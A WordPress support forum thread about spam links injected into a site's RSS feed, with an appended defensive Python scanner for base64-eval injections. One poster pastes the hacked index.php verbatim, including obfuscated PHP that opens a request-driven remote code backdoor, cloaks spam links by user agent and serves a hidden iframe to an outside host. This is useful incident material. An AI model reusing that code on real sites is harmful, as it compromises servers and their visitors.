• Hi, can someone help?

    I have spent months building a site with WordPress, and have a high ranking on Google. Recently the outgoing RSS feed from my site has not been working; running it through a feed validation site, I get the resulting error line

    This feed does not validate

    Line 176, column 15:XML parsing error: <unknown.:176:15: junk after document element

    …with a whole load of link spam showing up immediately after this highlighted line…

    <!-- google --><font style="position: absolute;overflow: hidden;height: 0;width: 0">

    When I update wordpress the problem goes away and my RSS feed works, but only to return around 2 days later with the same problem…spam in my RSS feed and it not working. I installed the “bad behaviour” plugin immediately after updating but the problem comes back.

    What can I do, short of wiping my wordpress installation and starting again? I want to act fast as I don’t want my Google rankings affected.

    I have backups of exported XML files from my wordpress site.

    Thanks

  • Thread Starter betelguese

    (@betelguese)

    Hmm…good points Gangleri and RVoodoo !

    This is a tricky one.

    I recently discovered I had anonymous ftp access allowed, this must be set to default on my web host as I’ve never touched it. That’s a definite security hole right there. I have now obviously blocked it.

    I will make doubly sure that it’s not a dodgy plugin doing it, and look at other possible sources on the server.

    Hi Betelguese,

    I have the same problem, and I couldn’t find a solution to it. Were you able to fix it?

    Thanks

    I am also having the same problem. Did you find a fix?

    I have the same problem as well. I am using wordpress 3.0.1

    Except for this RSS validation issue I don’t have any problems. Where can this be? How is this information called? If you give the address like yoursite.com/rss, the rss.php script in wp-includes is called. I’ve checked those files and they are clean. Where does the rest come from?

    This is the result: https://feedvalidator.org/check.cgi?url=turkmac.com%2ffeed

    Moderator James Huff

    (@macmanx)

    Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Default theme (WordPress 1.5 – 2.9.2) or the Twenty Ten theme (WordPress 3.0 and higher) to rule-out a theme-specific issue (themes can affect feeds).

    Thank you for the quick answer. I already tried that. I switched themes, tried other ones including the standard one and disabled all plugins. RSS junk is there. It begins so:

    <!-- linksnkl --> <style>.zjg{position: absolute; overflow: auto; height: 0; width: 0;}</style><li class=zjg> <a href=https://quietcornerwildlife.com/

    Moderator James Huff

    (@macmanx)

    In that case, the junk could have been inserted into almost any of the core files. Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    I noticed the same thing when I tried to publish an RSS feed to Feedburner. Sure enough, I checked the validation and found this hidden code in my index.php file…

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwppZigkX1JFUVVFU1RbJ2RmcXczMWYnXSkKZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsnZGZxdzMxZiddKSk7CiRocmVmID0gJ2h0dHA6Ly93d3cucHJvc29mdHdhcmVzdG9yZS5jb20vJzsKJHdvcmRzID0gYXJyYXkoJ1NvZnR3YXJlIFN0b3JlJywgJ01pY3Jvc29mdCBTb2Z0d2FyZScsICdBZG9iZSBTb2Z0d2FyZScsICdBdXRvZGVzayBTb2Z0d2FyZScsICdCb3JsYW5kIFNvZnR3YXJlIHNob3AnLCAnVk13YXJlIFNvZnR3YXJlJywgJ1Nob3AgU29mdHdhcmUnLCAnTUFDIFNvZnR3YXJlJywgJ1dpbmRvd3MgU29mdHdhcmUnLCAnU3ltYW50ZWMgc2hvcCcpOwoka2V5bnVtID0gY291bnQoJHdvcmRzKTsKJGFsdHMgPSAkd29yZHM7CgokciA9IHJhbmQoMCwgMyk7CiRyMiA9IHJhbmQoNCwgNyk7CiRyMyA9IHJhbmQoOCwgJGtleW51bS0xKTsKc2h1ZmZsZSgkYWx0cyk7CmZvcigkaT0wOyAkaTwka2V5bnVtOyAkaSsrKQp7CmlmKCRpPT0kciB8fCAkaT09JHIyIHx8ICRpPT0kcjMpCnsKJHI0ID0gcmFuZCgxLCAzKTsKJHN0ciA9IGltcGxvZGUoIiAiLCBhcnJheV9zbGljZSgkd29yZHMsIDAsIHJhbmQoMSwgaW50dmFsKCRrZXludW0vMikrMSkpKTsKJGFsdHNbJGldID0gIjxoND48YSBocmVmPVwiJGhyZWZcIiBhbHQ9XCIkc3RyXCIgdGl0bGU9XCIkc3RyXCI+U2hvcCAiLiRhbHRzWyRpXS4iPC9hPjwvaDQ+IjsKfQp9CmFycmF5X3B1c2goJGFsdHMsICI8YSBocmVmPVwiJGhyZWZcIj4kaHJlZjwvYT4iKTsKc2h1ZmZsZSgkYWx0cyk7CiRzdHIgPSBpbXBsb2RlKCIgIiwgJGFsdHMpOwppZihwcmVnX21hdGNoKCIvKGNyYXdsKXwoZ29vZ2xlKXwoeWFob28pfChiaW5nKXwoc3B5KXwoYm90KXwocGVybCl8KHB5dGhvbil8KGhvbG1lcyl8KGFsZXhhKXwoYi1vLXQpfChmaW5kbGlua3MpfChpY2hpcm8pfChsYXJiaW4pfChsaW5rKXwobHdwKXwoUHljVVJMKXwoc2NydWJieSl8KHNlYXJjaCl8KHN0YWNrKXwodXBkYXRlZCkvaSIsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpCmVjaG8oIjxkaXYgYWxpZ249Y2VudGVyPiRzdHI8L2Rpdj4iKTsKZWxzZQplY2hvKCI8Zm9udCBzdHlsZT1cInBvc2l0aW9uOi8qKi9hYnNvbHV0ZTtvdmVyZmxvdzovKiovaGlkZGVuOy8qKi93aWR0aDovKiovMFwiPiRzdHI8YSBocmVmPSckaHJlZic+JGhyZWY8L2E+PC9mb250PiIpOw==")); ?>
    <?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>

    Not only that, I checked my server file modification dates and found at least one other file that had been hacked, the 404.shtml file which is a host file, not a WordPress file. It had the following code

    <!-- SHTML Wrapper - 404 Not Found -->
    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    My webhost is BlueHost by the way.

    Ominously, I checked another entirely different account I have on BlueHost and it too had the same files hacked. These were also WordPress sites.

    So right now I’m not quite sure if it’s WordPress that has the problem, my Webhost, or a combination of both. But I find this deeply troubling.

    I’ve just discovered others talking about this…
    https://womm.leolincourt.com/fourohfourcgi-is-this-a-website-hack-attempt

    My 404.shtml file had been modified on 10/7/10 while my index.php file had been modified on 10/21/10.

    All my WordPress sites on BlueHost, on two different accounts have been hacked in the same way.

    This is a huge problem that needs more input from others.

    cnymike: The mentioned 404 page code does *not* appear to be a hack. Yes, the feed looks bad. See the above suggestions for that.

    As for the 404, I do not believe this to be a problem. The following code is the default code loaded into a brand-new generated BlueHost 404 page.

    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    As you can see, it is making a call to a directory called cgi-sys which is on a root level of the server and not accessible to view.

    My guess would be that BlueHost manages the default 404 page in that directory and that, when they made a change to their 404 page, they likely made a change to how their own default 404.shtml files were handled as well.

    You can test this by creating any random subdomain and then checking the files loaded in there by default. Your 404.shtml page will bear that code by default.

    Further research does confirm that the odd looking 404.shtml code is not a hack but a change in system generated 404. It was a coincidental but unrelated event.

    The hack on the index.html file on the other hand is indeed the result of nefarious activity and it’s not clear whether it was a plugin, theme or what that caused it. But there it is and the base64 code, once decoded, indicates links to two sites, one of whose purpose is to do a drive-by download to your computer.

    Nasty.
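Added example (not part of the original thread or any poster's code): a read-only Python scanner for the injection pattern shown above, `eval(base64_decode("..."))` appended to a PHP file. It decodes each literal payload without executing it and reports the embedded URLs and whether the payload emits zero-size hidden markup like the spam seen in the feed; the sample tree and the `spam.example` domain are constructed.

```python
import base64, binascii, re, tempfile
from pathlib import Path

# eval(base64_decode("...")) with a literal string argument, as in the hacked index.php.
INJECT_RE = re.compile(rb"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']""")
URL_RE = re.compile(rb"""https?://[^\s"'<>\\]+""")
# Zero-size styling like the hidden spam block seen in the feed.
HIDDEN_RE = re.compile(rb"(height|width)\s*:\s*0\b")
CSS_COMMENT_RE = re.compile(rb"/\*.*?\*/", re.S)

def scan_file(path):
    """Return one finding per injected blob; payloads are decoded, never executed."""
    data = Path(path).read_bytes()
    findings = []
    for m in INJECT_RE.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1))
        except (binascii.Error, ValueError):
            decoded = b""  # malformed blob: still report its location
        urls = {u.decode("ascii", "replace") for u in URL_RE.findall(decoded)}
        findings.append({
            "file": str(path),
            "line": data.count(b"\n", 0, m.start()) + 1,
            "urls": sorted(urls),
            "hidden_markup": bool(HIDDEN_RE.search(CSS_COMMENT_RE.sub(b"", decoded))),
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root, most recently modified first."""
    files = sorted(Path(root).rglob("*.php"), key=lambda p: p.stat().st_mtime, reverse=True)
    return [f for p in files for f in scan_file(p)]

def demo():
    """Scan a constructed two-file tree; spam.example is a placeholder domain."""
    payload = (b"echo '<font style=\"position: absolute;overflow: hidden;height: 0;"
               b"width: 0\"><a href=\"http://spam.example/\">x</a></font>';")
    injected = (b"<?php\nrequire('./wp-blog-header.php');\n?><?php eval(base64_decode(\""
                + base64.b64encode(payload) + b"\")); ?>\n")
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_bytes(injected)
        Path(root, "wp-load.php").write_bytes(b"<?php\n// clean file\n")
        return scan_tree(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run `scan_tree` against a downloaded copy of the site root; because results come back newest-modified first, files changed around the dates the spam reappeared surface at the top.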

  • The topic ‘Link Spam in embedded RSS’ is closed to new replies.